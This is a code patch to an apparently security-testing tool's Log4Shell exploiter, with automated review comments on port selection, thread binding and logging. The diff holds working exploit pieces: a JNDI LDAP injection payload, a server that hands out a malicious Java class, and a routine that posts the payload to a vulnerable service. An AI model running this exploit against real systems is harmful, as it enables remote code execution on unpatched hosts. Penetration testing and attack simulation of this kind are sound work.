From 8a120110f5b65ae348b72ec8f715480a8a2e80eb Mon Sep 17 00:00:00 2001
From: vakarisz
Date: Wed, 5 Jan 2022 12:04:21 +0200
Subject: [PATCH] Agent: change ldap and http ports to be chosen dynamically in log4shell

---
 monkey/infection_monkey/exploit/log4shell.py | 28 ++++++++-----------
 .../log4shell_utils/requests/poc_docker.py | 6 ++--
 2 files changed, 14 insertions(+), 20 deletions(-)

diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py
index 3d95e92d7..a8af38401 100644
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@@ -19,6 +19,7 @@ from infection_monkey.model import (
     MONKEY_ARG,
     VictimHost,
 )
+from infection_monkey.network.info import get_free_tcp_port
 from infection_monkey.network.tools import get_interface_to_target
 from infection_monkey.utils.commands import build_monkey_commandline
 from infection_monkey.utils.monkey_dir import get_monkey_dir_path
@@ -30,13 +31,13 @@ class Log4ShellExploiter(WebRCE):
     _TARGET_OS_TYPE = ["linux", "windows"]
     EXPLOIT_TYPE = ExploitType.VULNERABILITY
     _EXPLOITED_SERVICE = "Log4j"
-    LDAP_PORT = 8080
-    CLASS_HTTP_SERVER_PORT = 1337
     DOWNLOAD_TIMEOUT = 15
 
     def __init__(self, host: VictimHost):
         super().__init__(host)
         self._client = None
+        self.ldap_port = get_free_tcp_port()
+        self.class_http_server_port = get_free_tcp_port()
 
     def exploit_host(self):
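Review bot: The two back-to-back `get_free_tcp_port()` calls in `__init__` can hand back the same port if the helper only probes for a free port and does not keep the socket (its implementation is not in this diff), and nothing here reserves either value until `LDAPExploitServer` and `HTTPServer` bind them later in `exploit_host` and `_run_class_http_server`. If both attributes end up equal the two servers collide on one port; if another process takes the port in the meantime, the later bind fails. At minimum guard the pair, `while self.class_http_server_port == self.ldap_port:` / `    self.class_http_server_port = get_free_tcp_port()`, and consider choosing each port at bind time rather than at construction. `__init__` is complete within the hunk; `exploit_host` continues outside it.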
@@ -53,15 +54,13 @@ class Log4ShellExploiter(WebRCE):
         java_class = self.build_java_class(command)
 
         class_http_server_ip = get_interface_to_target(self.host.ip_addr)
-        java_class_http_thread = Log4ShellExploiter.get_java_class_server_thread(
-            class_http_server_ip, java_class
-        )
+        java_class_http_thread = self.get_java_class_server_thread(class_http_server_ip, java_class)
         java_class_http_thread.start()
 
         ldap = LDAPExploitServer(
-            ldap_server_port=Log4ShellExploiter.LDAP_PORT,
+            ldap_server_port=self.ldap_port,
             http_server_ip=class_http_server_ip,
-            http_server_port=self.CLASS_HTTP_SERVER_PORT,
+            http_server_port=self.class_http_server_port,
             storage_dir=get_monkey_dir_path(),
         )
         ldap_thread = ldap.get_run_thread()
@@ -86,7 +85,7 @@ class Log4ShellExploiter(WebRCE):
 
     def build_ldap_payload(self):
         interface_ip = get_interface_to_target(self.host.ip_addr)
-        return f"${{jndi:ldap://{interface_ip}:{Log4ShellExploiter.LDAP_PORT}/dn=Exploit}}"
+        return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
 
     # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
     def build_command(self, path, http_path):
@@ -133,20 +132,15 @@ class Log4ShellExploiter(WebRCE):
             self.wfile.write(self.java_class)
             Log4ShellExploiter.HTTPHandler.class_downloaded = True
 
-    @staticmethod
-    def _run_class_http_server(ip):
-
-        server = http.server.HTTPServer(
-            (ip, Log4ShellExploiter.CLASS_HTTP_SERVER_PORT), Log4ShellExploiter.HTTPHandler
-        )
+    def _run_class_http_server(self, ip):
+        server = http.server.HTTPServer((ip, self.class_http_server_port), Log4ShellExploiter.HTTPHandler)
         while (
             not Log4ShellExploiter.HTTPHandler.class_downloaded
             and not Log4ShellExploiter.HTTPHandler.stop
         ):
             server.handle_request()
 
-    @staticmethod
-    def get_java_class_server_thread(ip: str, java_class: bytes):
+    def get_java_class_server_thread(self, ip: str, java_class: bytes):
         Log4ShellExploiter.HTTPHandler.java_class = java_class
-        return Thread(target=Log4ShellExploiter._run_class_http_server, args=[ip])
+        return Thread(target=self._run_class_http_server, args=[ip])
diff --git a/monkey/infection_monkey/exploit/log4shell_utils/requests/poc_docker.py b/monkey/infection_monkey/exploit/log4shell_utils/requests/poc_docker.py
index 9743391a0..6ac59eb2b 100644
--- a/monkey/infection_monkey/exploit/log4shell_utils/requests/poc_docker.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/requests/poc_docker.py
@@ -13,9 +13,9 @@ def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]):
     payload = {"uname": payload, "password": "m0nk3y"}
     for url in urls:
         try:
-            requests.post(url, data=payload, timeout=5, verify=False)  # noqa DUO123
-        except requests.ReadTimeout:
-            logger.debug("Couldn't send request to the vulnerable machine")
+            resp = requests.post(url, data=payload, timeout=5, verify=False)  # noqa DUO123
+        except requests.ReadTimeout as e:
+            logger.debug(f"Log4shell request failed {e}")
 
 
 def build_urls(open_ports: List[int], host: VictimHost) -> List[str]:
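Review bot: `http.server.HTTPServer(...)` is still constructed inside `_run_class_http_server`, which is the thread target, so if the dynamically chosen `self.class_http_server_port` is already in use by the time the thread starts, the resulting `OSError` dies with the worker thread and `exploit_host` carries on as if the class server were listening. Binding on the calling thread in `get_java_class_server_thread` and handing the bound server to the thread makes that failure visible where it can be handled, as in the rewrite below. The new `server = ...` line is also 106 columns wide, past the 100-column width the removed lines were wrapped to, so the formatter will re-wrap it anyway. Both `_run_class_http_server` and `get_java_class_server_thread` are complete within the hunk.
```python
    def _run_class_http_server(self, server: http.server.HTTPServer):
        # … unchanged: serve-until-downloaded loop over server.handle_request() …

    def get_java_class_server_thread(self, ip: str, java_class: bytes):
        Log4ShellExploiter.HTTPHandler.java_class = java_class
        # Bind on the caller's thread so a port-in-use OSError reaches exploit_host
        server = http.server.HTTPServer(
            (ip, self.class_http_server_port), Log4ShellExploiter.HTTPHandler
        )
        return Thread(target=self._run_class_http_server, args=[server])
```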
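Review bot: `resp` on the new `requests.post` line is assigned but never read within the hunk, so it only earns an unused-variable lint warning; keep the bare call as before unless the response is actually consumed later. The new debug message also loses the one detail that distinguishes iterations of the loop, the URL, and uses an f-string where the logging module's lazy formatting is the usual form: `logger.debug("Log4shell request to %s failed: %s", url, e)`. Separately, only `requests.ReadTimeout` is caught, so any other `requests.RequestException` (a refused connection, for instance) escapes the loop and the remaining URLs are never tried; if that is not intended, widen the except clause. `trigger_exploit` starts before the hunk.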